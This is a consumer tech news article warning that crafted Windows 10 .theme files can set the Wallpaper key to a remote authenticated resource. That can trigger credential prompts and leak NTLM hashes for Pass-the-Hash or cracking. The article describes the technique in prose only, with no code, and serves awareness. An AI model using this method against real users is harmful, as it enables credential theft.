Here’s Why You Should Think Twice About Downloading Windows 10 Custom Themes

Windows Themes
Imagine this—you're having a good day, your PC is running smoothly, and you decide to install a custom Windows 10 theme, but then all of a sudden things go wrong. Very wrong. As in, you find out your Microsoft account has been compromised, but how can that be? Well, it might have been that custom Windows theme you downloaded and installed.

Like practically everything else software related, Windows themes can be vectors for remote miscreants to essentially hack your digital well being. Or to be a bit more specific, security researcher Jimmy Bayne (@bohops on Twitter) warns that custom Windows themes can be leveraged to conduct a so-called 'Pass-the-Hash' attack.

Windows Theme Login

"Using a Windows .theme file, the Wallpaper key can be configured to point to a remote auth-required http/s resource. When a user activates the theme file (e.g. opened from a link/attachment), a Windows cred prompt is displayed to the user," Bayne explains.

"The wallpaper key is located under the 'Control Panel\Desktop' section of the .theme file. Other keys may possibly be used in the same manner, and this may also work for netNTLM hash disclosure when set for remote file locations," Bayne continues.

This ties into the ability for Windows uses to create personalized themes with custom colors, sounds, and so forth. Settings for the theme get saved to the %AppData%\Microsoft\Windows\Theme directory with a .theme extension, and can be saved to a shareable file package to share with others on the web (or as an email attachment).

What the security researcher discovered, however, is that specially crafted Windows themes can steal a user's login credentials. Pass-the-Hash attacks entail tricking a user into accessing a remote resource that requires login credentials. This is where the maliciously crafted Windows themes come into play, which can be especially problematic if a user has a Microsoft account rather than just a local account. This would enable an attacker to access certain online services a user might have.

Even though the password is hashed, weaker ones can be easy to crack. To wit, the folks at Bleeping Computer said it took around 4 seconds to de-hash an "easy password" when using this method.

Bayne said he let Microsoft know about his discovery a while back, but it was never patched because from Microsoft's vantage point, it is a "feature by design." How lovely. That being the case, be extra cautious of downloading and applying custom Windows themes